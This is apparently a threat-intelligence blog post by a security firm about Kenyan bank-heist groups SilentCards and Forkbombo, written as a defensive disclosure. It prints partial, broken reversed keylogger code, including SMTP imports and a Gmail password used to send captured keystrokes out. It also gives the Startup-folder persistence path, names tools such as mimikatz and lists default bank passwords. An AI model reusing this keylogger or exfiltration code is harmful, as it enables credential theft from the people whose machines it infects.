Tracking the 400 mil shillings AFT – SilentCards big come back.


Our CNO team that is selectively tasked with offensive operations to gather CTI, for our customers so as to arm them with the most accurate intelligence, stumbled on a server, early 2018, that was used for a larger heist late last year, where the actor made 400,000,000 + KSHs payday. Due to the fact the institution is not our client and has not directly or indirectly contacted us for approval to post this blog and the laws of Kenya do not agree we do so, we can’t name the affected institution, rather we can provide details of how such a heist occurs according to our research, observations and intel collection.

Threat Intelligence

SilentsCards threat actor is a home grown AFT and is an offshoot of Forkbombo Group. They started their robberies late 2017 and have been heisting organizations with lots of millions lost for the last one year. This group inherited the old version key logger used by Forkbombo and perfected it for collection of key logger data in a targeted environment.

The latest code used in several banks, after reversing has the main Def as OnKeyBoardEvent() and the file is usually saved up as

def OnKeyboardEvent(event):
    LOG_NEWACTIVE = wg.GetWindowText (wg.GetForegroundWindow())
        LOG_TEXT += " " + LOG_NEWACTIVE + " |\n"
        LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n\n"
        print LOG_NEWACTIVE

The second part specifies where the files logged are written into, by default SilentCards saves them in UserProfile as seen below with tar.gz as an extension to fool inexperienced analysts.

now =
COMPUTER_NAME= socket.gethostname()+" "+ socket.gethostbyname(socket.gethostname()) + ": "

By default, you will find these outputs in the home directory of the user who is logged, which by default happens when the users gets into their system after logging in.

The logger PE is usually copied and saved into Startup folder which is an older TTP, that ForkBombo group used back in 2015-2017 and then abandoned and started using Scheduled-tasks, Registry and Drivers for persistence.

SilentCards still saves them in startup directory as :

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\PE.File.Executable

In short, SilentCards have not improved their operations to try defend their tactics in the long run, but there is a time, our Defenders ended up in a fire fight with SilentCards, as they tried to defend a module they used for CnC during a Breach Readiness service.

SilentCards are known to use AnyDesk for Remote Administration, they are known to use GoToMyPc since 2015, and with collaboration with PsExec, they can laterally move through the ICT Workstations deploying key logger and through the DataCenters dumping passwords and other essential access tokens with use of an open source tool called mimikatz.

Our CNO team observed as they collected Windows creds, and later targeted Card Center servers, by either looking for the server owners and collecting their SSHD credentials. By default most organizations usually have default passwords they set up for users, and on this bank they used three different default passwords.

a) admin123

b) welcome1

c) secret123

SilentCards was also interested on the initial entry to get into a box called Polarisprapp01 and Eqc-VC01. Using these two servers, just like their sister threat actor, Forkbombo group, they started coping all Audit Reports generated by the institutions from the auditors workstations for further review of the institutions situation awareness and Risk Analysis and copied them via Eqc-VC01 an internal server, to a C2 server overseas.

After collecting as many credentials as they could, 400 Million Kenya Shillings was moved in batches, crediting fictitious accounts, then accessed either via VISA/MASTERCARD overseas or with use of Mobile Money Transfers. Unlike Forkbombo which has several money mules, SilentCards relies a lot on foreigners for quick transactions outside the country.

Outlook on SilentCards

We believe this threat actor is still active in different infrastructures and is planning to attack another institution this Easter by running huge transactions. By raising community awareness, we intend to minimize damage and loss to your customers and to ours by maiming their activities and capabilities when exploiting infrastructures across East Africa.

Understanding the Adversaries : The Forkbombo group.

The Forkbombo code-name of this threat actor was derived from a toolkit they used back in 2016-2017 to send keylogger data after infecting an institution. The email was

This is a homegrown cyber threat actor that has been active since 2015 and has grown to a huge cartel made up of Money Launderers, Hackers, Coders, Operators and Insiders. This adversary represents constant threat to a wide variety of institutions mostly being the Banking sector around Kenya and its neighboring countries.

This threat actor is known to specialize in python scripts to create quick tools for exploitation phase of an environment. They are also known to use opensource tools like Empire, Metasploit, DeathStar, Bloodhound, CrackMapExec, Aesshell, XmultiShell, CHAOS, Katoolin etc.

Their initial keylogger was written by a student who later became a bigger player of the group and he registered in 2016 to be used as mail receiver of the keylogger data as below:

import pythoncom, pyHook, sys, logging, socket, datetime, os, win32gui,time
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email import Encoders
global MAIL_SENT
gmail_user = “”
gmail_pwd = “mlimani_25891011”
now =
COMPUTER_NAME= socket.gethostname()+” “+ socket.gethostbyname(socket.gethostname()) + “: “

This email was used in a lot of money heists around the Nairobi before they changed to and later for further attacks. Whenever the keylogger generated its data, a file with extension .tar.gz was saved at the usernames userprofile with the username as the name of the file. When we responded to institutions with Forkbombo malware infestation we would find servers and workstations full of these text files that had that extension.

A reversed keylogger snapshot of the old Forkbombo’s logger that sent data to a Gmail account.

In 2017, several key leaders of Forkbombo group were arrested in a Safehouse they used in Yaya center with several hackers disappearing into the woods and splitting into two groups.

OnNet team do pursue them and has code-named these threat actors as SilentCards and GrapZone for attribution. In 2018, Grapzone members including money mules joined back together and new bigger Forkbombo group was made.

In the coming months, OnNet team will share with you more deeper CTI on these groups, why they are currently at a dispute and opposing sides.

OnNet pays special attention to these intruders and is currently pursuing other Advanced Financial Threats that are targeting our customers.